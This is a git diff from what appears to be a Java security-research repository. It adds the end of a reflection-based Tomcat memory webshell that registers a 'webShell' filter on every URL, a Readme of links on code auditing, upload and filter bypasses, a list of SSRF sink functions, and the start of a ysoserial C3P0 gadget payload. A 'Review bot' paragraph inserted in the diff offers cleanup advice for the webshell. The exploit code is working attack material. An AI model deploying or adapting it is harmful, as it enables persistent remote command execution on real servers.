+ org.apache.catalina.core.StandardContext standardContext= (org.apache.catalina.core.StandardContext) contextField.get(applicationContext);
+
+ //修改state
+ java.lang.reflect.Field stateField=org.apache.catalina.util.LifecycleBase.class.getDeclaredField("state");
+ stateField.setAccessible(true);
+ stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);
+
+ //注册filter
+ javax.servlet.FilterRegistration.Dynamic filterRegistration = servletContext.addFilter("webShell", new WebShell());
+ filterRegistration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{"/*"});
+
+ //添加到filterConfigs
+ java.lang.reflect.Method filterStartMethod = org.apache.catalina.core.StandardContext.class.getMethod("filterStart");
+ filterStartMethod.setAccessible(true);
+ filterStartMethod.invoke(standardContext, null);
+
+ //调整filter位置
+ org.apache.tomcat.util.descriptor.web.FilterMap[] filterMaps = standardContext.findFilterMaps();
+ for (int i = 0; i < filterMaps.length; i++) {
+ if (filterMaps[i].getFilterName().equalsIgnoreCase("webShell")) {
+ org.apache.tomcat.util.descriptor.web.FilterMap filterMap = filterMaps[i];
+ filterMaps[i] = filterMaps[0];
+ filterMaps[0] = filterMap;
+ break;
+ }
+ }
+
+ //恢复成LifecycleState.STARTE,否则会造成服务不可用
+ stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED);
+
+ }
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+
+ }
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
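Review bot: The comment `//恢复成LifecycleState.STARTE,否则会造成服务不可用` names a state `STARTE` that does not exist; the statement under it sets `LifecycleState.STARTED`, so the comment should read `// restore LifecycleState.STARTED; otherwise the context remains unavailable`. In `WebShell.doFilter` the parameters `request` and `response` shadow the `request` local of the enclosing constructor, so `request.getParameter("cmd")` inside the filter is easy to misread as the outer variable; renaming the filter's parameters (for example `req`/`resp`) would remove the ambiguity. `contextField` is likewise declared twice in nested scopes (constructor and the inner `try`), and a distinct name for the inner one would make the reflection chain easier to follow.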
diff --git "a/java\345\233\236\346\230\276/src/main/resources/application.properties" "b/java\345\233\236\346\230\276/src/main/resources/application.properties"
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/resources/application.properties"
@@ -0,0 +1 @@
+
diff --git "a/java\345\233\236\346\230\276/src/test/java/com/firebasky/echo/EchoApplicationTests.java" "b/java\345\233\236\346\230\276/src/test/java/com/firebasky/echo/EchoApplicationTests.java"
new file mode 100644
index 0000000..75e4d32
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/test/java/com/firebasky/echo/EchoApplicationTests.java"
@@ -0,0 +1,13 @@
+package com.firebasky.echo;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class EchoApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
index 4cca6c6..34fce36 100644
--- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
+++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
@@ -3,10 +3,29 @@
>[java危险函数](./java危险函数.md)
>[代码审计基础](./代码审计基础.pdf)
-+ 2021/6/1 [JAVA代码审计的一些Tips(附脚本)](https://xz.aliyun.com/t/1633)
-+ 2021/6/1 [java代码审计之租车系统](./java代码审计之租车系统.pdf) [框架下载连接](http://down.chinaz.com/soft/38425.htm)
-+ 2021/6/1 [JAVA代码审计之铁人下载系统 v1.0](http://foreversong.cn/archives/1005)
-+ 2021/6/2 [JAVA代码审计 | 因酷网校在线教育系统](https://xz.aliyun.com/t/2646)
-+ 2021/6/3 [Java 代码审计入门-02 SQL 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6872) [流程图CVE-2019-9615](./img/CVE-2019-9615.png)
-+ 2021/6/3 [Java 代码审计入门-03 XSS 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6937) [漏洞代码CVE_2018_19178](./code/CVE_2018_19178.java)
-+ 2021/6/4 [Java 代码审计入门-04 SSRF 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/7186)
++ 2021/6/1 [JAVA代码审计的一些Tips(附脚本)](https://xz.aliyun.com/t/1633)
++ 2021/6/1 [java代码审计之租车系统](./java代码审计之租车系统.pdf) [框架下载连接](http://down.chinaz.com/soft/38425.htm)
++ 2021/6/1 [JAVA代码审计之铁人下载系统 v1.0](http://foreversong.cn/archives/1005)
++ 2021/6/2 [JAVA代码审计 | 因酷网校在线教育系统](https://xz.aliyun.com/t/2646)
++ 2021/6/3 [Java 代码审计入门-02 SQL 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6872) [流程图CVE-2019-9615](./img/CVE-2019-9615.png)
++ 2021/6/3 [Java 代码审计入门-03 XSS 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6937) [漏洞代码CVE_2018_19178](./code/CVE_2018_19178.java)
++ 2021/6/4 [Java 代码审计入门-04 SSRF 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/7186)
++ 2021/10/6 学习了java代码审计书中的jspxcms,发现其中的**conn.getContentType('image')可以通过自己搭建的http服务器实现**。 evilserver.php
++ 2021/11/01 突然间看了一篇文章[代码审计入门之Jeeplus代码审计](https://www.freebuf.com/articles/web/220066.html)
++ 2021/11/02 [CVE-2020-10189 Zoho ManageEngine反序列化RCE](https://xz.aliyun.com/t/7439) **对文件进行反序列化,绕过上传。** [参考](https://www.anquanke.com/post/id/200474)
++ 2022/02/03 [java代码审计系列第一弹——巡云轻论坛](https://www.freebuf.com/vuls/317847.html)
+
+
+## 好文章
+
+https://www.sec-in.com/author/8 这个师傅太猛了
+
++ 2021/12/21 [SpringMVC寻找Controller技巧](https://www.sec-in.com/article/552) **@(.*?)Mapping\(**
++ 2021/12/21 [绕过后缀安全检查进行文件上传](https://sec-in.com/article/647) **解决了条件竞争不知道文件名的问题,通过异常报错让程序停止向下执行绕过。(在multipart做文章)**
++ 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。
++ 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd)
++ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/)
++ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习**
++ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数**
++ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据**
++ 2022/11/06 [【干货分享】五分钟教你挖掘小程序漏洞](https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞) **小程序挖掘**
diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md"
index f2c2aed..c2ebd96 100644
--- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md"
+++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md"
@@ -28,6 +28,10 @@ SQL 注入: Select、Dao 、from 、delete 、update、insert
命令注入: getRuntime、exec、cmd、shell GroovyShell.evaluate
```
+```java
+ssrf: HttpClient.execute()、HttpClient.executeMethod()、HttpURLConnection.connect、HttpURLConnection.getInputStream、URL.openStream、HttpServletRequest、BasicHttpEntityEnclosingRequest、DefaultBHttpClientConnection、BasicHttpRequest、
+```
+
```java
缓冲区溢出: strcpy,strcat,scanf,memcpy,memmoGetc(),fgetc(),getchar;read,printf
```
diff --git "a/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md" "b/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md"
index 3af5a91..784f71e 100644
--- "a/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md"
+++ "b/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md"
@@ -50,6 +50,90 @@ public static String bytesToHexString(byte[] bArray, int length) {
}
```
+## 不出网利用
+
+
+[JAVA反序列化之C3P0不出网利用](https://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483871&idx=1&sn=56c63dc3f4dc22ad9c61143ee2c484df&chksm=c2b103a9f5c68abfb8e6cb39e81210cce98a3a6850c69b756b7018bc0db829d00af08839d8fc&mpshare=1&scene=23&srcid=1009lg8jEvc5MFXslLojyUud&sharer_sharetime=1644428964407&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd)
+
+```java
+package ysoserial.payloads;
+
+
+import java.io.PrintWriter;
+import java.sql.SQLException;
+import java.sql.SQLFeatureNotSupportedException;
+import java.util.logging.Logger;
+
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import javax.naming.Referenceable;
+import javax.naming.StringRefAddr;
+import javax.sql.ConnectionPoolDataSource;
+import javax.sql.PooledConnection;
+
+import com.mchange.v2.c3p0.PoolBackedDataSource;
+import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
+
+import org.apache.naming.ResourceRef;
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.annotation.PayloadTest;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+
+/**
+yulegeyu modified
+ */
+@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
+@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
+@Authors({ Authors.MBECHLER })
+public class C3P0Tomcat implements ObjectPayload